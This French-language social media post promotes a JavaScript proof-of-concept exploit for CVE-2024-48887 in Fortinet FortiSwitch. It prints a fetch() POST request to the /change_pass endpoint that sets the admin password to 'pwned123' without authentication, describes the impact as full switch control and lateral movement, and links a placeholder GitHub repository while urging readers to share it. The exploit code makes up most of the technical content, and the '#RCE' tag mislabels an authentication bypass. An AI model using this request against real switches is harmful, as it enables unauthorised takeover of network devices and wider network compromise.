
un extrait JavaScript léger montrant comment des changements de mot de passe non autorisés peuvent être déclenchés sur des endpoints GUI vulnérables de Fortinet FortiSwitch.
🚨 PoC (JavaScript) de FortiSwitch CVE-2024-48887 🚨
🔥 Je viens de publier un extrait JavaScript léger montrant comment des changements de mot de passe non autorisés peuvent être déclenchés sur les points d'accès GUI de Fortinet FortiSwitch vulnérables.
🛠️ À propos de la vulnérabilité : Un attaquant peut créer une simple requête fetch() pour manipuler les paramètres de mot de passe sans aucune authentification, en ciblant directement les variantes du point d'accès /change_pass.
fetch('http://target-ip/change_pass', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
username: 'admin',
newpass: 'pwned123',
confirm: 'pwned123'
})
})
.then(res => res.text())
.then(data => console.log('Response:', data));
💡 Impact : Contrôle total du commutateur, potentiel de mouvement latéral et compromission du réseau.
📁 Dépôt : github.com/yourusername/CVE-2024-48887-FortiSwitch-Exploit ⭐ Mettez une étoile au dépôt et partagez-le avec vos collègues de l'infosec !
📢 Suivez l'analyse complète et les alertes en temps réel via @cybersecplayground
#JavaScript #infosec #bugbounty #CVE2024 #Fortinet #FortiSwitch #RCE #exploitdev #cybersecurity #PoC #github #OSINT #cybersecplayground